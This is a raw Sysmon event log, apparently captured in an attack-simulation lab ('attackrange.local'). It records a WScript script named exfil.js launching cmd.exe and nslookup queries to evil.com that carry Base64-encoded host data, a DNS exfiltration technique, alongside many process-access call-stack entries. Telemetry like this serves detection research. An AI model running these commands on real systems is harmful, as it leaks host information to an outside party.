14:21:43.123{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F7-629A-3D45-000000005F02}4296C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212887Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.123{2E1864BB-18E0-629A-6742-000000005F02}39765976C:\Windows\System32\WScript.exe{2E1864BB-18F7-629A-3D45-000000005F02}4296C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212886Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.123{2E1864BB-18F7-629A-3D45-000000005F02}4296C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfxlufo.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000212885Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.108{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlblh.tmpMD5=A05FE277EAD578D85B93DE56B6EB0A01,SHA256=0DDAD6A171E00B4C55CFFC9B3292AFE046D71EAF195601FF934293413FA92292,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000212884Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.092{2E1864BB-18F7-629A-3B45-000000005F02}42006424C:\Windows\system32\conhost.exe{2E1864BB-18F7-629A-3C45-000000005F02}3712C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212883Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.092{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212882Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.092{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212881Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.092{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F7-629A-3C45-000000005F02}3712C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212880Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.092{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212879Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.092{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212878Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.092{2E1864BB-18F7-629A-3A45-000000005F02}76485580C:\Windows\system32\cmd.exe{2E1864BB-18F7-629A-3C45-000000005F02}3712C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212877Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.091{2E1864BB-18F7-629A-3C45-000000005F02}3712C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A KioqV2luMzJfTmV0d29ya0FkYXB0ZXJDb25maWd1cmF0aW9uKioq evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F7-629A-3A45-000000005F02}7648C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A KioqV2luMzJfTmV0d29ya0FkYXB0ZXJDb25maWd1cmF0aW9uKioq evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlblh.tmp 2>&1 10341000x8000000000000000212876Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.070{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F7-629A-3B45-000000005F02}4200C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212875Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.070{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F7-629A-3B45-000000005F02}4200C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212874Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.055{2E1864BB-18F7-629A-3B45-000000005F02}42006424C:\Windows\system32\conhost.exe{2E1864BB-18F7-629A-3A45-000000005F02}7648C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212873Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.055{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F7-629A-3B45-000000005F02}4200C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212872Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.055{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212871Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.055{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212870Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.055{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212869Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.055{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212868Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.055{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F7-629A-3A45-000000005F02}7648C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212867Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.039{2E1864BB-18E0-629A-6742-000000005F02}39768032C:\Windows\System32\WScript.exe{2E1864BB-18F7-629A-3A45-000000005F02}7648C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212866Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.054{2E1864BB-18F7-629A-3A45-000000005F02}7648C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A KioqV2luMzJfTmV0d29ya0FkYXB0ZXJDb25maWd1cmF0aW9uKioq evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlblh.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000212865Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.039{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlnec.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000212864Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.008{2E1864BB-18F6-629A-3845-000000005F02}74688064C:\Windows\system32\conhost.exe{2E1864BB-18F7-629A-3945-000000005F02}6324C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212863Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.008{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212862Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.008{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212861Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.008{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212860Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.008{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212859Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.008{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F7-629A-3945-000000005F02}6324C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212858Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.008{2E1864BB-18F6-629A-3745-000000005F02}42803776C:\Windows\system32\cmd.exe{2E1864BB-18F7-629A-3945-000000005F02}6324C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212857Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.012{2E1864BB-18F7-629A-3945-000000005F02}6324C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com 